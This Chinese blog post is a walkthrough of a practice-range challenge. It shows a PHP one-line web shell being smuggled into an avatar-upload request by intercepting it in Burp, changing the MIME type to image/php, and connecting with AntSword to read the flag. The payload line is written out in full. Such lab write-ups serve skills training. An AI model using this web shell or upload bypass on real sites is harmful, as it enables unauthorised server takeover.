前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >某靶场的通关记录,渗透初学者提升技能的好文!

某靶场的通关记录,渗透初学者提升技能的好文!

原创
作者头像
雨笋教育
修改于 2021-09-28 06:30:43
修改于 2021-09-28 06:30:43
4400
举报
文章被收录于专栏:雨笋教育雨笋教育

某靶场题目的通关记录,反正是不知道叫啥~

打开页面之后,

在右上角这一块有注册登录

那没的说,有这个,必定是先注册登录一波。

登录之后跳转到个人中心,

看到有一个修改头像的地方~

接下来……

上图片马还是直接上一句话?

嗯……要不还是来个一句话试试先~

直接小手点一点插件,发现是PHP的脚本语言。

来个PHP一句话马~

了~

尝试看看能不能直接上马,但是…

那就打开BP来拦包~

传个正常的图片抓个包看看~

发现内容是加密传输的,那就…… 整上

保留前面的这一段后面我们直接写一句话马:

image=data:image/jpeg;,

所以这一段内容为:

image=data:image/jpeg;,<?php @eval($_POST['yusun']); ?>

接下来,需要更改一下类型,

image/jpeg 改为 image/php

使其当成php存储

然后把一句话马的内容加密

将数据包里的原内容删除

替换为我们加密后的内容

点击发送数据包。

通过响应包发现有个保存路径

打开蚁剑尝试连接一下

将响应包所返回路径中反斜杠去掉

拼接URL,填入密码,测试连接~

哎嘿,绿色就是好看。

在目录里面找到了Flag文件,复制内容,提交~

就很perfect~相当完美。

后续将给大家带来更多靶场实操案例,更多渗透测试干货持续关注雨笋教育小编

*本文章仅供技术交流分享,请勿做未授权违法攻击,雨笋教育不负任何责任。具体请参考《网络安全法》。

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

评论
登录后参与评论
暂无评论
推荐阅读
编辑精选文章
换一批
【数据结构】排序算法篇二
任取待排序元素序列中的某元素作为基准值key(把它直接排在它最终要排的那个位置),按照该排序码将待排序集合分割成两子序列,左子序列中所有元素均小于基准值,右子序列中所有元素均大于基准值,然后最左右子序列重复该过程,直到所有元素都排列在相应位置上为止。
六点半就起.
2024/10/16
910
【数据结构】排序算法篇二
【数据结构初阶第十九节】八大排序系列(下篇)—[详细动态图解+代码解析]
假定在待排序的记录序列中,存在多个具有相同的关键字的记录,若经过排序,这些记录的相对次序保持不变,即在原序列中,r[i]=r[j],且r[i]在r[j]之前,而在排序后的序列中,r[i]仍在r[j]之前,则称这种排序算法是稳定的;否则称为不稳定的。(就是相同的数据排序之后的相对次序保持不变)
云边有个稻草人
2025/03/16
480
【数据结构初阶第十九节】八大排序系列(下篇)—[详细动态图解+代码解析]
【初阶数据结构】星河中的光影 “排” 象:排序(下)
接上一篇,解决掉剩余的排序方法,本篇有些许难度,建议巩固好上一篇再来进行本篇的学习
DARLING Zero two
2025/02/26
600
【初阶数据结构】星河中的光影 “排” 象:排序(下)
数据结构-排序
        在插入排序的基础上,分组进行排序,把每隔gap个元素看作一组进行排序,gap每次都细分最后细分到最基本的插入排序
2024/08/06
980
《数据结构》八大排序算法 必读!
本文将介绍常见八大排序,包括直接插入排序、希尔排序、选择排序、堆排序、冒泡排序、快速排序、归并排序以及计数排序(计数排序和桶排序面试基本不涉及,本文将简要介绍),本内容是重点中的重点,请务必全部掌握!
码神联盟
2021/10/27
1.2K0
《数据结构》八大排序算法 必读!
数据结构初阶·排序算法(内排序)
目前常见的排序算法有9种,冒泡排序,选择排序,插入排序,希尔排序,快速排序,归并排序,计数排序,基数排序,桶排序。实际生活中排序的应用也是有限的,今天我们介绍其中7个,基数排序和桶排序不介绍。介绍常用的即可。
_lazy
2024/10/16
1160
数据结构初阶·排序算法(内排序)
八大常见算法排序详解
在以前排序算法不多的时候,科学家们想着如何优化时间复杂度… 这时希尔想到,插入排序最坏的情况是 O(N^2) ,是在序列逆序的情况下,以目标排升序为例,最大的数字在最前面,那么要是将插入进行分组会不会交换的更快?答案是确实是快了! 因为将插入排序的思想进行分组插入后,如果分组越大,那么大的数字能更快的向后移动,而分组越小,大的数字就会越慢的向后移动。相反,分组越大,那么这个序列也越不接近有序,而分组越小,反而越接近有序。 所以希尔就根据这种特点,创造了缩小增量排序的基本思想! 简单来说: 希尔排序是按照不同步长对元素进行插入排序,==当刚开始元素很无序的时候,步长最大,所以插入排序的元素个数很少,速度很快;当元素基本有序了,步长很小,插入排序对于有序的序列效率很高。==所以,希尔排序的时间复杂度会比o(n^2)好一些。 实质就是一种分组插入的思想! 希尔排序的特性总结:
利刃大大
2023/04/12
3650
【初阶数据结构】深度解析七大常见排序|掌握底层逻辑与原理
排序是指使用一串记录,按照其中或某些关键字的大小,递增或递减的排序起来的操作(记录是指待排序的具体数据项)。
是店小二呀
2024/08/01
1500
【初阶数据结构】深度解析七大常见排序|掌握底层逻辑与原理
【初阶数据结构与算法】排序算法总结篇(每个小节后面有源码)(直接插入、希尔、选择、堆、冒泡、快速、归并、计数以及非递归快速、归并排序)
   那么本次的排序算法总结就分享到这里啦,初阶数据结构与算法这个篇章的知识也就到这里结束啦,凑巧也是2024年最后一篇文章,从2025年开始就进入C++的学习啦,感谢大家近来的支持,大家新年快乐!    bye~
TANGLONG
2025/01/09
1060
【数据结构】排序(下)
当我们使用快速排序时,最坏的情况就是数组有序,此时的时间复杂度为O(N^2) 最好的情况就是key每次取中位数 所以我们为了避免最坏情况的发生,我们在快速排序的基础上衍生了一种优化的方法叫做三数取中 还有一种方法是随机选key,但随机选key的效果不如三数取中
s-little-monster
2024/06/18
1010
【数据结构】排序(下)
手撕初阶数据结构之---排序
排序:所谓排序,就是使⼀串记录,按照其中的某个或某些关键字的⼤⼩,递增或递减的排列起来的操作。
Undoom
2024/09/23
660
手撕初阶数据结构之---排序
【数据结构】——原来排序算法搞懂这些就行,轻松拿捏
基准值的注释:在快排的过程中,每一次我们要取一个元素作为枢纽值,以这个数字来将序列划分为两部分。 在此我们采用三数取中法,也就是取左端、中间、右端三个数,然后进行排序,将中间数作为枢纽值。
用户11286421
2024/09/23
940
【数据结构】——原来排序算法搞懂这些就行,轻松拿捏
【初阶数据结构与算法】——手撕八大经典排序算法
那如果前面的元素都比要插入的数据大呢? 那就一直比,直到比完第一个元素,然后end- -之后变成-1,还是放到end位置的后面,即让它成为新的第一个元素。
YIN_尹
2024/01/23
3420
【初阶数据结构与算法】——手撕八大经典排序算法
【数据结构】-图解八大排序(思路+实现+总结)
八大排序详解 一、前言 二、排序概念及应用 1、概念 2、排序应用 三、排序算法接口展示 四、插入排序 1、直接插入排序 2、希尔排序 五、选择排序 1、直接选择排序 2、堆排序 六、交换排序 1、冒泡排序 2、快速排序 1)hoare 2)挖坑法 3)前后指针法 4)优化 3、快排非递归 七、归并排序 1、归并排序 1)递归归并 2)非递归归并 八、计数排序 1、计数排序 九、性能分析 一、前言 本章主要讲解: 八大排序的基本知识及其实现 注:这里的八大排序指直接插入,希尔,选择,堆排,冒泡,快排,归
用户9645905
2022/11/30
4470
【数据结构】-图解八大排序(思路+实现+总结)
【排序算法】八大排序(下)(c语言实现)(附源码)
之前我们学习了八大排序中的前四种:冒泡排序、选择排序、插入排序、希尔排序:
ephemerals__
2024/10/24
1970
【排序算法】八大排序(下)(c语言实现)(附源码)
十大排序:插入/希尔/选择/堆/冒泡/快速/归并/计数/基数/桶排序 汇总(C语言)
在计算机科学中,排序算法是一种重要的算法类别,用于将一组元素按照特定的顺序进行排列。排序算法的应用非常广泛,从日常生活中的字典排序到大规模数据处理中的并行排序,都离不开排序算法的支持。
用户11317877
2024/10/16
1690
十大排序:插入/希尔/选择/堆/冒泡/快速/归并/计数/基数/桶排序 汇总(C语言)
八大排序(二)堆排序,快速排序,归并排序,计数排序
堆排序其实就是利用堆的第二个特点:任一结点的值都是其子树所有结点的最大值或最小值。
小灵蛇
2024/06/06
1140
八大排序(二)堆排序,快速排序,归并排序,计数排序
数据结构——排序算法
冒泡排序(Bubble Sort)是一种简单的排序算法,它重复地遍历要排序的数列,以升序为例,一次比较两个元素,如果它们的顺序错误(前一个元素大于后一个元素)就把它们交换过来。遍历数列的工作是重复地进行直到没有再需要交换,也就是说该数列已经排序完成。
HZzzzzLu
2024/11/26
1020
数据结构——排序算法
【数据结构】八大排序算法详解
把待排序的记录按其关键码值的大小逐个插入到一个已经排好序的有序序列中,直到所有的记录插入完为止,得到一个新的有序序列
用户10925563
2024/06/04
7800
【数据结构】八大排序算法详解
【初阶数据结构】常见五大排序算法及部分算法优化讨论
1.排序:所谓排序,就是使一串记录或者数据,按照其中的某个或某些关键字的大小,递增或递减的排列起来的操作。
ZLRRLZ
2024/12/13
1800
【初阶数据结构】常见五大排序算法及部分算法优化讨论
推荐阅读
相关推荐
【数据结构】排序算法篇二
更多 >
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档